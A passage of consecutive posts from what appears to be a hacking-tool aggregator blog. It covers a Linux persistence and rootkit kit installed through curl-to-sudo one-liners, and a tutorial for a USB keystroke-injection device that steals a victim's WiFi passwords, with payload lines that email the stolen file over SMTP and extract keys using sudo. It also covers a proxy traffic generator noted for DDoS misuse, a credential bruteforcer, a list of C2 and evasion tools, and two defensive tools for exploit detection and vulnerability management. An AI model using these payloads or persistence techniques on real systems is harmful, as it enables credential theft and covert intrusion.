D3m0n1z3dShell - Demonized Shell Is An Advanced Tool For Persistence In Linux

By: Zion3R


Demonized Shell is an advanced tool for persistence in Linux.


Install

git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh

One-Liner Install

Download D3m0n1z3dShell with all files:

curl -L https://github.com/MatheuZSecurity/D3m0n1z3dShell/archive/main.tar.gz | tar xz && cd D3m0n1z3dShell-main && sudo ./demonizedshell.sh

Load D3m0n1z3dShell statically (without the static-binaries directory):

sudo curl -s https://raw.githubusercontent.com/MatheuZSecurity/D3m0n1z3dShell/main/static/demonizedshell_static.sh -o /tmp/demonizedshell_static.sh && sudo bash /tmp/demonizedshell_static.sh

Demonized Features

  • Auto Generate SSH keypair for all users
  • APT Persistence
  • Crontab Persistence
  • Systemd User level
  • Systemd Root Level
  • Bashrc Persistence
  • Privileged user & SUID bash
  • LKM Rootkit Modified, Bypassing rkhunter & chkrootkit
  • LKM rootkit with a file encoder, persistent ICMP backdoor, and other features
  • ICMP Backdoor
  • LD_PRELOAD Setup PrivEsc
  • Static binaries for process monitoring, credential dumping, enumeration, trolling, and other utilities

Pending Features

  • LD_PRELOAD Rootkit
  • Process Injection
  • One-liner install, for example: curl github.com/test/test/demonized.sh | bash
  • Static D3m0n1z3dShell
  • Intercept Syscall Write from a file
  • ELF/Rootkit Anti-Reversing Technique
  • PAM Backdoor
  • rc.local Persistence
  • init.d Persistence
  • motd Persistence
  • Persistence via php webshell and aspx webshell

Other features will be added in the future.

Contribution

If you want to contribute and help with the tool, please contact me on Twitter: @MatheuzSecurity

Note

We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.



PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

By: Zion3R


PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

Features:

  • Utilizes a list of proxy IP addresses from a specified file.
  • Supports both HTTP and HTTPS proxies.
  • Allows users to input the target website URL, proxy file path, and a static port.
  • Makes HTTP requests to the specified website using each proxy.
  • Parses HTML content to extract and visit links on the webpage.
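As a rough sketch of how such a crawler can work (this is not PhantomCrawler's actual code; the proxy file format follows proxies.txt as described below, and the target URL is a placeholder), the following pairs requests with BeautifulSoup to fetch a page through each proxy and collect its links:

import requests
from bs4 import BeautifulSoup

def crawl_with_proxies(url, proxy_file):
    # One "ip:port" proxy per line, as in proxies.txt
    with open(proxy_file) as f:
        proxies = [line.strip() for line in f if line.strip()]
    for proxy in proxies:
        proxy_map = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
        try:
            resp = requests.get(url, proxies=proxy_map, timeout=10)
        except requests.RequestException:
            continue  # skip dead or unresponsive proxies
        soup = BeautifulSoup(resp.text, "html.parser")
        links = [a["href"] for a in soup.find_all("a", href=True)]
        print(f"{proxy}: HTTP {resp.status_code}, {len(links)} links found")

crawl_with_proxies("https://example.com", "proxies.txt")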

Usage:

  • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
  • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
  • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
  • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
  • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

Get new proxies (with ports) and add them to proxies.txt in this format: 50.168.163.176:80
  • You can get them from https://free-proxy-list.net/. These free proxies are not validated and some might not work, so validate them before adding.

How to Use:

  1. Clone the repository:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
  2. Install dependencies:
pip3 install -r requirements.txt
  3. Run the script:
python3 PhantomCrawler.py

Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


Snapshots:

If you find this GitHub repo useful, please consider giving it a star! 



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

 

Introduction

During the summer of 2022, I decided to do exactly that: build a device that would allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory, and nuances of building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, the payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating the pico-ducky, you only need to copy the modified payload (adjusted with your SMTP details for the Windows exploit, and/or with the Linux password and USB drive name for the Linux exploit) to the RPi Pico.

Prerequisites

  • Physical access to the victim's computer.

  • The victim's computer must be unlocked.

  • For the exfiltration over a network medium (Windows exploit), the victim's computer must have internet access in order to send the stolen data using SMTP.

  • Knowledge of the victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using a Rubber Ducky, but keep in mind that an RPi Pico costs about $4.00 while a Rubber Ducky costs about $80.00.

  • However, while pico-ducky is a good and budget-friendly solution, the Rubber Ducky does offer advantages like stealthiness and support for the latest DuckyScript version.

  • In order to use DuckyScript to write the payload on your RPi Pico, you first need to convert it to a pico-ducky. Follow these simple steps to create one.

Keystroke injection tool

A keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like the Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy the payload with ease.

Keystroke injection

The payload uses the STRING command to process keystrokes for injection. STRING accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is into the target machine. ENTER and SPACE simulate presses of the corresponding keyboard keys.

Delays

We use the DELAY command to temporarily pause execution of the payload. This is useful when the payload needs to wait for an element such as a command line to load. A delay is especially useful at the very beginning, when a new USB device is connected to the targeted computer: the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs, setup time is very short; in most cases it takes a fraction of a second, because the drivers are built-in. However, in some instances a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
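To make the STRING/DELAY mechanics concrete, here is a minimal sketch in Python (a hypothetical helper, not the project's writer.py) that emits a DuckyScript payload which waits for HID enumeration before typing a command:

# Hypothetical sketch: generate a minimal DuckyScript payload.
def write_payload(path, delay_ms=2000, command="powershell"):
    lines = [
        f"DELAY {delay_ms}",  # give the target time to register the HID
        f"STRING {command}",  # typed exactly as-is on the target
        "ENTER",              # simulate pressing the Enter key
    ]
    with open(path, "w") as f:
        f.write("\n".join(lines) + "\n")

write_payload("payload.dd")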

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer or device. Once the data is collected, an adversary can package it to avoid detection while sending it over the network, using encryption or compression. The two most common ways of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once the passwords have been exported to the .txt file, the payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions, visit the following link. The payload template also needs to be updated with your SMTP information, meaning you need to update RECEIVER_EMAIL, SENDER_EMAIL, and your email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use an SMTP server from another email provider, but be mindful of the SMTP server address and port number you write in the payload.

  • Keep in mind that some networks may block usage of an unknown SMTP server at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd), you need to connect a jumper wire between GND and GPIO5 to comply with the code in code.py on your RPi Pico. For more information about how to set up multiple payloads on your RPi Pico, visit this link.

Storing stolen data to USB flash drive

Once the passwords have been exported from the computer, the data will be saved to the appointed USB flash drive. For this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script, you will need to update it with the correct name of your USB stick, after which you can type the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles and uses plugins for reading/writing data. The keyfile plugin uses an .ini-style format to store network configuration profiles; it supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with a regex to extract the data of interest. For filtering, a positive lookbehind assertion ((?<=keyword)) is used. The positive lookbehind matches at a position right after the keyword without making the keyword itself part of the match, so the regex (?<=keyword).* matches any text after the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.
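The same lookbehind logic is easy to test outside the payload. Here is a minimal sketch in Python (the sample keyfile content is illustrative, not taken from a real machine):

import re

# Illustrative NetworkManager keyfile fragment
keyfile = """[wifi]
ssid=WLAN1

[wifi-security]
psk=pass1
"""

# The lookbehind matches right after the keyword, so the keyword itself
# is not part of the match; .* then captures the rest of the line.
ssid = re.search(r"(?<=ssid=).*", keyfile).group()
psk = re.search(r"(?<=psk=).*", keyfile).group()
print(ssid, psk)  # WLAN1 pass1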

For more information about NetworkManager, here are some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of the Rubber Ducky over the RPi Pico is that it doesn't show up as a USB mass storage device once plugged in; the machine sees it only as a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.
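On CircuitPython-based builds like pico-ducky, this kind of check typically lives in boot.py. Below is a minimal sketch under the pin assumptions above (treat the exact pin and setup as an assumption, not the project's verbatim code):

# boot.py sketch: hide the Pico's USB mass storage when GPIO15 is
# jumpered to GND.
import board
import digitalio
import storage

pin = digitalio.DigitalInOut(board.GP15)
pin.direction = digitalio.Direction.INPUT
pin.pull = digitalio.Pull.UP  # reads False when jumpered to GND

if not pin.value:
    storage.disable_usb_drive()  # don't enumerate as mass storage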

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. To run the script successfully, you need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below is an example of how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful because, in order to succeed, you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't stealthy; quite the opposite, it's rather bulky, especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


Top 20 Most Popular Hacking Tools in 2023

By: Zion3R

As in previous years, we have made a ranking of the most popular tools published between January and December 2023.

The tools of this year encompass a diverse range of cybersecurity disciplines, including AI-Enhanced Penetration Testing, Advanced Vulnerability Management, Stealth Communication Techniques, Open-Source General Purpose Vulnerability Scanning, and more.

Without going into further detail, we have prepared a useful list of the most popular tools on KitPloit in 2023:


  1. PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


  2. Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


  3. Faraday - Open Source Vulnerability Management Platform


  4. CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare


  5. Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools


  6. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


  7. Waf-Bypass - Check Your WAF Before An Attacker Does


  8. PentestGPT - A GPT-empowered Penetration Testing Tool


  9. Sirius - First Truly Open-Source General Purpose Vulnerability Scanner


  10. LSMS - Linux Security And Monitoring Scripts


  11. GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM


  12. Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403


  13. ThunderCloud - Cloud Exploit Framework


  14. GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


  15. Kscan - Simple Asset Mapping Tool


  16. RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry


  17. DNSWatch - DNS Traffic Sniffer and Analyzer


  18. IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


  19. TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions


  20. XSS-Exploitation-Tool - An XSS Exploitation Tool





Happy New Year wishes the KitPloit team!


VED-eBPF - Kernel Exploit And Rootkit Detection Using eBPF

By: Zion3R


VED (Vault Exploit Defense)-eBPF leverages eBPF (extended Berkeley Packet Filter) to implement runtime kernel security monitoring and exploit detection for Linux systems.

Introduction

eBPF is an in-kernel virtual machine that allows code execution in the kernel without modifying the kernel source itself. eBPF programs can be attached to tracepoints, kprobes, and other kernel events to efficiently analyze execution and collect data.

VED-eBPF uses eBPF to trace security-sensitive kernel behaviors and detect anomalies that could indicate an exploit or rootkit. It provides two main detections:

  • wCFI (Control Flow Integrity) traces the kernel call stack to detect control flow hijacking attacks. It works by generating a bitmap of valid call sites and validating that each return address matches a known call site.

  • PSD (Privilege Escalation Detection) traces changes to credential structures in the kernel to detect unauthorized privilege escalations.


How it Works

VED-eBPF attaches eBPF programs to kernel functions to trace execution flows and extract security events. The eBPF programs submit these events via perf buffers to userspace for analysis.

wCFI

wCFI traces the call stack by attaching to functions specified on the command line. On each call, it dumps the stack, assigns a stack ID, and validates the return addresses against a precomputed bitmap of valid call sites generated from objdump and /proc/kallsyms.

If an invalid return address is detected, indicating a corrupted stack, it generates a wcfi_stack_event containing:

* Stack trace
* Stack ID
* Invalid return address

This security event is submitted via perf buffers to userspace.

The wCFI eBPF program also tracks changes to the stack pointer and kernel text region to keep validation up-to-date.
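As a simplified userspace illustration of the call-site idea (not VED-eBPF's actual bitmap code, which derives valid call sites from objdump), one can collect kernel text symbol addresses from /proc/kallsyms and test a return address against them; note that reading real addresses requires sufficient privileges:

# Simplified sketch: collect kernel text symbol addresses and check
# whether a (hypothetical) return address is a known symbol start.
def load_kallsyms(path="/proc/kallsyms"):
    addrs = set()
    with open(path) as f:
        for line in f:
            addr, kind, *rest = line.split()
            if kind.lower() == "t":  # text (code) symbols
                addrs.add(int(addr, 16))
    return addrs

known = load_kallsyms()
ret_addr = 0xFFFFFFFF81000000  # hypothetical return address
print("known symbol" if ret_addr in known else "not a known symbol")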

PSD

PSD traces credential structure modifications by attaching to functions like commit_creds and prepare_kernel_cred. On each call, it extracts information like:

* Current process credentials
* Hashes of credentials and user namespace
* Call stack

It compares credentials before and after the call to detect unauthorized changes. If an illegal privilege escalation is detected, it generates a psd_event containing the credential fields and submits it via perf buffers.
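Here is a minimal BCC sketch of the kind of hook PSD builds on (not VED-eBPF's code; it merely logs each commit_creds call with the calling process):

from bcc import BPF

prog = r"""
#include <uapi/linux/ptrace.h>

int trace_commit_creds(struct pt_regs *ctx) {
    bpf_trace_printk("commit_creds called\n");
    return 0;
}
"""

b = BPF(text=prog)
b.attach_kprobe(event="commit_creds", fn_name="trace_commit_creds")
print("Tracing commit_creds... Ctrl-C to stop")
b.trace_print()  # prints pid/comm plus the message for each call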

Prerequisites

VED-eBPF requires:

  • Linux kernel v5.17+ (tested on v5.17)
  • eBPF support enabled
  • BCC toolkit

Current Status

VED-eBPF is currently a proof-of-concept demonstrating the potential for eBPF-based kernel exploit and rootkit detection. Ongoing work includes:

  • Expanding attack coverage
  • Performance optimization
  • Additional kernel versions
  • Integration with security analytics

Conclusion

VED-eBPF shows the promise of eBPF for building efficient, low-overhead kernel security monitoring without kernel modification. By leveraging eBPF tracing and perf buffers, critical security events can be extracted in real time and analyzed to identify emerging kernel threats in cloud-native environments.



Legba - A Multiprotocol Credentials Bruteforcer / Password Sprayer And Enumerator

By: Zion3R


Legba is a multiprotocol credentials bruteforcer / password sprayer and enumerator built with Rust and the Tokio asynchronous runtime in order to achieve better performance and stability while consuming fewer resources than similar tools (see the benchmark below).

For the building instructions, usage and the complete list of options check the project Wiki.


Supported Protocols/Features:

AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace), Cassandra/ScyllaDB, DNS subdomain enumeration, FTP, HTTP (basic authentication, NTLMv1, NTLMv2, multipart form, custom requests with CSRF support, files/folders enumeration, virtual host enumeration), IMAP, Kerberos pre-authentication and user enumeration, LDAP, MongoDB, MQTT, Microsoft SQL, MySQL, Oracle, PostgreSQL, POP3, RDP, Redis, SSH / SFTP, SMTP, STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ), TCP port scanning, Telnet, VNC.

Benchmark

Here's a benchmark of legba versus thc-hydra running some common plugins, both targeting the same test servers on localhost. The benchmark has been executed on a macOS laptop with an M1 Max CPU, using a wordlist of 1000 passwords with the correct one being on the last line. Legba was compiled in release mode, Hydra compiled and installed via brew formula.

Far from being an exhaustive benchmark (some legba features are simply not supported by hydra, such as CSRF token grabbing), this table still gives a clear idea of how using an asynchronous runtime can drastically improve performances.

Test Name                   | Hydra Tasks | Hydra Time | Legba Tasks | Legba Time
HTTP basic auth             | 16          | 7.100s     | 10          | 1.560s (4.5x faster)
HTTP POST login (wordpress) | 16          | 14.854s    | 10          | 5.045s (2.9x faster)
SSH                         | 16          | 7m29.85s * | 10          | 8.150s (55.1x faster)
MySQL                       | 4 **        | 9.819s     | 4 **        | 2.542s (3.8x faster)
Microsoft SQL               | 16          | 7.609s     | 10          | 4.789s (1.5x faster)

* This result would suggest a default delay between connection attempts in Hydra. I've tried to study the source code to find such a delay, but to my knowledge there is none; for some reason it's simply very slow.
** For MySQL, Hydra automatically reduces the number of tasks to 4, therefore legba's concurrency level has been adjusted to 4 as well.

License

Legba is released under the GPL 3 license. To see the licenses of the project dependencies, install cargo license with cargo install cargo-license and then run cargo license.



Metahub - An Automated Contextual Security Findings Enrichment And Impact Evaluation Tool For Vulnerability Management

By: Zion3R


MetaHub is an automated contextual security findings enrichment and impact evaluation tool for vulnerability management. You can use it with AWS Security Hub or any ASFF-compatible security scanner. Stop relying on useless severities and switch to impact scoring definitions based on YOUR context.


MetaHub is an open-source security tool for impact-contextual vulnerability management. It can automate the process of contextualizing security findings based on your environment and your needs (YOUR context), identifying ownership, and calculating an impact score that you can use to define prioritization and automation. You can use it with AWS Security Hub or any ASFF security scanner (like Prowler).

MetaHub describes your context by connecting to the affected resources in the affected accounts. It can describe information about your AWS account and organization, the affected resource's tags, the related CloudTrail events, the affected resource's configuration, and all its associations: if you are contextualizing a security finding affecting an EC2 instance, MetaHub will not only connect to the instance itself but also to its IAM roles; from there, it will connect to the IAM policies associated with those roles. It will connect to the Security Groups and analyze all their rules, the VPC and the subnets where the instance is running, the volumes, the Auto Scaling Groups, and more.

After fetching all the information from your context, MetaHub evaluates certain important conditions for all your resources: exposure, access, encryption, status, environment, and application. Based on those calculations, and in addition to the information from all the security findings affecting the resource, MetaHub generates a score for each finding.

Check the following dashboard generated by MetaHub. You have the affected resources, with all the security findings affecting them grouped together, along with the original severity of each finding. After that, you have the Impact Score and all the criteria MetaHub evaluated to generate that score. All this information is filterable, sortable, groupable, downloadable, and customizable.



You can rely on this Impact Score for prioritizing findings (where should you start?), directing attention to critical issues, and automating alerts and escalations.

MetaHub can also filter, deduplicate, group, report, suppress, or update your security findings in automated workflows. It is designed for use as a CLI tool or within automated workflows, such as AWS Security Hub custom actions or AWS Lambda functions.

The following is the JSON output for an EC2 instance; see how MetaHub organizes all the information about its context together under associations, config, tags, account, cloudtrail, and impact:



Context

In MetaHub, context refers to information about the affected resources like their configuration, associations, logs, tags, account, and more.

MetaHub doesn't stop at the affected resource but analyzes any associated or attached resources. For instance, if there is a security finding on an EC2 instance, MetaHub will not only analyze the instance but also the security groups attached to it, including their rules. MetaHub will examine the IAM roles that the affected resource is using and the policies attached to those roles for any issues. It will analyze the EBS attached to the instance and determine if they are encrypted. It will also analyze the Auto Scaling Groups that the instance is associated with and how. MetaHub will also analyze the VPC, Subnets, and other resources associated with the instance.

The Context module can retrieve information from the affected resources, the affected accounts, and every associated resource. It has five main parts: config, associations (included under config), tags, cloudtrail, and account. By default, config and tags are enabled, but you can change this behavior using the option --context (to enable all the context modules, use --context config tags cloudtrail account). The output of each enabled key is added under the affected resource.

Config

Under the config key, you can find anything related to the configuration of the affected resource. For example, if the affected resource is an EC2 instance, you will see keys like private_ip, public_ip, or instance_profile.

You can filter your findings based on Config outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Associations

Under the associations key, you will find all the associated resources of the affected resource. For example, if the affected resource is an EC2 Instance, you will find resources like: Security Groups, IAM Roles, Volumes, VPC, Subnets, Auto Scaling Groups, etc. Each time MetaHub finds an association, it will connect to the associated resource again and fetch its own context.

Associations are key to understanding the context and impact of your security findings, such as their exposure.

You can filter your findings based on Associations outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Tags

MetaHub relies on AWS Resource Groups Tagging API to query the tags associated with your resources.

Note that not all AWS resource types support this API. You can check the supported services.

Tags are a crucial part of understanding your context. Tagging strategies often include:

  • Environment (like Production, Staging, Development, etc.)
  • Data classification (like Confidential, Restricted, etc.)
  • Owner (like a team, a squad, a business unit, etc.)
  • Compliance (like PCI, SOX, etc.)

If you follow a proper tagging strategy, you can filter and generate interesting outputs. For example, you could list all findings related to a specific team and provide that data directly to that team.

You can filter your findings based on Tags outputs using the option: --mh-filters-tags TAG=VALUE. See Tags Filtering

CloudTrail

Under the cloudtrail key, you will find critical CloudTrail events related to the affected resource, such as creation events.

The CloudTrail events that we look for are defined per resource type, and you can add, remove, or change them by editing the configuration file resources.py.

For example, for an affected resource of type Security Group, MetaHub will look for the following events:

  • CreateSecurityGroup: Security Group Creation event
  • AuthorizeSecurityGroupIngress: Security Group Rule Authorization event.

Account

Under the account key, you will find information about the account where the affected resource is running, such as whether it's part of an AWS Organization, information about its contacts, etc.

Ownership

MetaHub also focuses on ownership detection. It can determine the owner of the affected resource in various ways. This information can be used to automatically assign a security finding to the correct owner, escalate it, or make decisions based on this information.

An automated way to determine the owner of a resource is critical for security teams. It allows them to focus on the most critical issues and escalate them to the right people in automated workflows. But automating workflows this way is only viable if you have a reliable way to define the impact of a finding, which is why MetaHub also focuses on impact.

Impact

The impact module in MetaHub focuses on generating a score for each finding based on the context of the affected resource and all the security findings affecting them. For the context, we define a series of evaluated criteria; you can add, remove, or modify these criteria based on your needs. The Impact criteria are combined with a metric generated based on all the Security Findings affecting the affected resource and their severities.

The following are the impact criteria that MetaHub evaluates by default:

Exposure

Exposure evaluates how the affected resource is exposed to other networks. For example: whether the affected resource is public, whether it is part of a VPC, whether it has a public IP, and whether it is protected by a firewall or a security group.

Possible Statuses    | Value | Description
effectively-public   | 100%  | The resource is effectively public from the Internet.
restricted-public    | 40%   | The resource is public, but there is a restriction, like a Security Group.
unrestricted-private | 30%   | The resource is private but unrestricted, like an open security group.
launch-public        | 10%   | These are resources that can launch other resources as public, e.g. an Auto Scaling Group or a Subnet.
restricted           | 0%    | The resource is restricted.
unknown              | -     | The resource couldn't be checked.

Access

Access evaluates the resource policy layer. MetaHub checks every available policy, including IAM managed policies, IAM inline policies, resource policies, bucket ACLs, and any association to other resources like IAM roles, whose policies are also analyzed. An unrestricted policy is not only an issue for that policy itself; it affects any other resource that uses it.

Possible Statuses       | Value | Description
unrestricted            | 100%  | The principal is unrestricted, without any condition or restriction.
untrusted-principal     | 70%   | The principal is an AWS account that is not part of your trusted accounts.
unrestricted-principal  | 40%   | The principal is not restricted (defined with a wildcard); there could be conditions restricting it or other restrictions, like S3 public access blocks.
cross-account-principal | 30%   | The principal is from another AWS account.
unrestricted-actions    | 30%   | The actions are defined using wildcards.
dangerous-actions       | 30%   | Some dangerous actions are defined as part of this policy.
unrestricted-service    | 10%   | The policy allows an AWS service as principal without restriction.
restricted              | 0%    | The policy is restricted.
unknown                 | -     | The policy couldn't be checked.

Encryption

Encryption evaluates the different encryption layers for each resource type. For example, for some resources it evaluates whether both the at_rest and in_transit encryption configurations are enabled.

Possible Statuses | Value | Description
unencrypted       | 100%  | The resource is not fully encrypted.
encrypted         | 0%    | The resource is fully encrypted, including any of its associations.
unknown           | -     | The resource encryption couldn't be checked.

Status

Status evaluates the status of the affected resource in terms of attachment or functioning. For example, for an EC2 instance we evaluate whether the resource is running, stopped, or terminated, while for resources like EBS volumes and Security Groups we evaluate whether they are attached to any other resource.

Possible Statuses | Value | Description
attached          | 100%  | The resource supports attachment and is attached.
running           | 100%  | The resource supports running and is running.
enabled           | 100%  | The resource supports enablement and is enabled.
not-attached      | 0%    | The resource supports attachment and is not attached.
not-running       | 0%    | The resource supports running and is not running.
not-enabled       | 0%    | The resource supports enablement and is not enabled.
unknown           | -     | The resource couldn't be checked for status.

Environment

Environment evaluates the environment where the affected resource is running. By default, MetaHub defines three environments: production, staging, and development, but you can add, remove, or modify these environments based on your needs. MetaHub evaluates the environment based on the tags of the affected resource, the account ID, or the account alias. You can define your own environment definitions and strategy in the configuration file (see Customizing Configuration).

Possible Statuses | Value | Description
production        | 100%  | It is a production resource.
staging           | 30%   | It is a staging resource.
development       | 0%    | It is a development resource.
unknown           | -     | The resource couldn't be checked for environment.

Application

Application evaluates the application that the affected resource is part of. MetaHub relies on the AWS myApplications feature, which relies on the awsApplication tag, but you can extend this functionality based on your context, for example by defining other tags you use for applications or services (like Service), or by relying on the account ID or alias. You can define your application definitions and strategy in the configuration file (see Customizing Configuration).

Possible Statuses | Value | Description
unknown           | -     | The resource couldn't be checked for application.

Findings Scoring

As part of the impact score calculation, we also evaluate the total amount of security findings affecting the resource and their severities. We use the following formula to calculate this metric:

(SUM of all (Finding Severity / Highest Severity) with a maximum of 1)

For example, if the affected resource has two findings affecting it, one with HIGH and another with LOW severity, the Impact Findings Score will be:

SUM(HIGH (3) / CRITICAL (4) + LOW (0.5) / CRITICAL (4)) = 0.875
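A hedged sketch of this calculation in Python (the severity weights LOW=0.5, HIGH=3, CRITICAL=4 are taken from the example above; other severities would follow the same pattern):

# Findings score: sum of severity ratios, capped at 1.
SEVERITY = {"LOW": 0.5, "HIGH": 3, "CRITICAL": 4}

def findings_score(severities, highest="CRITICAL"):
    total = sum(SEVERITY[s] / SEVERITY[highest] for s in severities)
    return min(total, 1.0)

print(findings_score(["HIGH", "LOW"]))  # 0.875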

Architecture

MetaHub reads your security findings from AWS Security Hub or any ASFF-compatible security scanner. It then queries the affected resources directly in the affected account to provide additional context. Based on that context, it calculates the impact. Finally, it generates different outputs based on your needs.



Use Cases

Some use cases for MetaHub include:

  • MetaHub integration with Prowler as a local scanner for context enrichment
  • Automating Security Hub findings suppression based on Tagging
  • Integrate MetaHub directly as Security Hub custom action to use it directly from the AWS Console
  • Create enriched HTML reports for your findings that you can filter, sort, group, and download
  • Create Security Hub Insights based on MetaHub context

Features

MetaHub provides a range of ways to list and manage security findings for investigation, suppression, updating, and integration with other tools or alerting systems. To avoid Shadowing and Duplication, MetaHub organizes related findings together when they pertain to the same resource. For more information, refer to Findings Aggregation

MetaHub queries the affected resources directly in the affected account to provide additional context using the following options:

  • Config: Fetches the most important configuration values from the affected resource.
  • Associations: Fetches all the associations of the affected resource, such as IAM roles, security groups, and more.
